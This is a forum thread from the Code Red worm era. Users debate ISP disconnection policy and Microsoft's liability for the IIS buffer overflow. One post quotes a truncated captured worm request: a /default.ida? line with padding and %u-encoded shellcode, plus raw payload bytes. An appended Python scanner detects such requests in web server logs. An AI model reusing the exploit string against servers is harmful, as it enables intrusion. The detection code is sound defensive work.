 | reply to IGGY
Re: Code Red II worm analysis Amen!
»66.120.182.18 (visit this link at your own risk -- I called to see if the ISP was interested in doing something and they told me to fix my stuff instead of addressing the problem) is killing me and my already minimal bandwidth sucks now....I've had it (huge gigantic period here) |
|
 | reply to Steve said by SJFriedl: said by rayramone: My question is: Why doesn't AT&T capture these ip's as well, and send a mass email saying "You're running IIS,
When people are causing harm to others, I think that being polite is not appropriate. "Mercy to the guilty is injustice to the innocent" - Adam Smith.
ISPs should pull the plug on these offenders and put them on a reconnect queue. If there is no cost to bad behavior (which includes negligent behavior), people will simply not learn.
Steve
Steve,
A big, huge "right on!!!" to that. What can we do to help? |
|
 Anon | reply to Steve said by SJFriedl: said by rayramone: My question is: Why doesn't AT&T capture these ip's as well, and send a mass email saying "You're running IIS,
When people are causing harm to others, I think that being polite is not appropriate. "Mercy to the guilty is injustice to the innocent" - Adam Smith.
ISPs should pull the plug on these offenders and put them on a reconnect queue. If there is no cost to bad behavior (which includes negligent behavior), people will simply not learn.
Steve
And yet, when I suggest that MS pay the cost, you defend them and say-It's just a bug, it's not the end of the world. "If there is no cost to bad behavior (which includes negligent behavior), people will simply not learn." Crackers are a fact of life. While they are, systems must be designed and manufactured to be cracker resistant. |
|
 IGGYNo Guru Just Here To HelpPremium,MVM join:2001-03-30 Chatham, IL | reply to dsldisaster My thread on that very subject - looks like they are trying = »Worms prompt AT&T to unplug customer Web sites
But they haven't seemed to get 2 my neighborhood yet = LOL!! -- Test Your Anti Virus at IGGYZ.COM |
|
|
|
 | reply to Anon
We don't live in a perfect world.....yet said by wgu: systems must be designed and manufactured to be cracker resistant.
Sounds good but it's not reality yet. Thank goodness for "good hackers" (if that's such a term) that raise awareness and educate everyone.  |
|
 SteveI know your IP addressConsultant join:2001-03-10 Yorba Linda, CA kudos:5 | reply to Anon
Re: Code Red II worm analysis said by wgu: And yet, when I suggest that MS pay the cost, you defend them and say-It's just a bug
When I say "It's just a bug", this characterizes intent, not effect. This is not some kind of evil plot by Microsoft or evidence of QA done only by monkeys or flagrant disregard for the customer. It's a pretty damn serious bug, but it's not the work of Satan.
When they were made aware of the problem, they moved very quickly to mitigate the damage, and any liability claim that anybody had on them started to dissolve rapidly. I don't have a good sense for when they are officially "off the hook", but I would say that after five weeks it's just not fair to blame Bill for this.
Steve -- Stephen J. Friedl / Software Consultant / Tustin, California USA / »www.unixwiz.net |
|
 Anon | said by SJFriedl: said by wgu: And yet, when I suggest that MS pay the cost, you defend them and say-It's just a bug
When I say "It's just a bug", this characterizes intent, not effect. This is not some kind of evil plot by Microsoft or evidence of QA done only by monkeys or flagrant disregard for the customer. It's a pretty damn serious bug, but it's not the work of Satan.
No, I certainly do not argue that it is the work of Satan, nor do I believe this was deliberate. But when an airplane crashes due to a manufacturing defect, no one argues that this was "just a bug" and that the airline company had no intent to crash the plane. They are culpable for not exercising best engineering practice to ensure that the error did not occur. Microsoft did NOT implement best engineering practice to make sure that this kind of buffer overflow did not occur. That is why they are culpable. Not because of intent, but because of negligence.
quote:
When they were made aware of the problem, they moved very quickly to mitigate the damage, and any liability claim that anybody had on them started to dissolve rapidly. I don't have a good sense for when they are officially "off the hook", but I would say that after five weeks it's just not fair to blame Bill for this
I disagree. Trying to fix negligence after it occurs may mitigate but certainly does not remove culpability. We have seen too many posts here and elsewhere pointing out how in many software firms, security is NOT a prime consideration. That coding engineering practice is not to make sure that the product is as free from these kinds of design error as humanly possible. The culture, and the reward system and the practice is to "get it out the door", not to make sure that these kinds of security bugs are stamped out.
Software writers and companies seem to feel that they are somehow immune from standard engineering responsibility, that sloppy habits, and negligent design and practice are OK. Must arises from the origins in toys and games of computers, where it does not really matter. If a toy does not behave as it should, well no one is really going to take it seriously. But Internet ready programs and operating systems do matter. Companies which reap large profits and claim to be critical to national productivity should have the attendant responsibilities that any other engineering company has. |
|
 Anon | reply to Steve There appears to be another worm out there now. I just (well, it came in 4AM PDT Aug 11) websnarfed an example. This is a type NNNN worm but carries a different payload. It installs a web page (Hacked by Chinese). See ftp.theory.physics.ubc.ca/outgoing/codered
It starts in the same way as standard CodeRed but then changes in its payload.
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u00 78%u0000%u00=a HTTP/1.0^M Content-type: text/xml HOST:www.worm.com Accept: */* Content-length: 3569 ^M Cache-Control: bypass-client=202.156.8.37^M Connection: close^M Via: 1.0 HHCE8^M X-Forwarded-For: 202.156.8.37^M ^M U~Kì~Aì^X^B^@^@SVW~M½èýÿÿ¹~F^@^@^@¸ÌÌÌÌó«Ç~Epþÿÿ^@^@^@^@é
......
It is longer than either of the other Code Reds, 4155 bytes rather than 4039 or 3818 bytes. |
|
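A log check built on the request shape quoted in the post above, as an added example that is not part of the thread: it flags `/default.ida?` requests that carry a long single-letter padding run followed by `%u` words, and groups the probing sources by padding letter. The Common Log Format input, the `MIN_PAD` threshold, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

MIN_PAD = 100  # assumed threshold for a "long" padding run; tune for your logs

# Common Log Format prefix: source address, timestamp, quoted request line.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)')
# /default.ida? + one letter repeated MIN_PAD or more times + whatever follows.
IDA_RE = re.compile(r"^/default\.ida\?(?P<pad>([A-Za-z])\2{%d,})(?P<rest>.*)$"
                    % (MIN_PAD - 1), re.IGNORECASE)
U_WORD_RE = re.compile(r"%u[0-9a-fA-F]{4}")


def classify(target):
    """Return padding details for a Code Red style request target, else None."""
    m = IDA_RE.match(target)
    if not m:
        return None
    pad = m.group("pad")
    return {"pad_char": pad[0].upper(), "pad_len": len(pad),
            "u_words": len(U_WORD_RE.findall(m.group("rest")))}


def scan(lines):
    """Group probing sources by padding letter: {letter: {source: hits}}."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        info = classify(m.group("target")) if m else None
        if info and info["u_words"] > 0:
            hits[info["pad_char"]][m.group("src")] += 1
    return {letter: dict(srcs) for letter, srcs in hits.items()}


def _line(src, target):
    return '%s - - [11/Aug/2001:04:00:00 -0700] "GET %s HTTP/1.0" 404 0' % (src, target)


# Constructed sample: documentation-range addresses, arbitrary pad length.
# N is the padding letter in the capture above; Code Red II requests pad with X.
TAIL = "%u9090%u6858%ucbd3%u7801=a"
SAMPLE = [
    _line("192.0.2.10", "/default.ida?" + "N" * 200 + TAIL),
    _line("192.0.2.10", "/default.ida?" + "N" * 200 + TAIL),
    _line("198.51.100.7", "/default.ida?" + "X" * 200 + TAIL),
    _line("203.0.113.5", "/default.ida?NNNN"),   # too short to count
    _line("203.0.113.5", "/index.html"),         # ordinary traffic
]

if __name__ == "__main__":
    for letter, srcs in sorted(scan(SAMPLE).items()):
        print(letter, srcs)
```

Grouping by padding letter separates the variants without touching the payload body, and the per-source counts give a list to hand to an abuse desk.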
 | This sounds like the original, before it was modified to attack faster and forgo the site defacement. |
|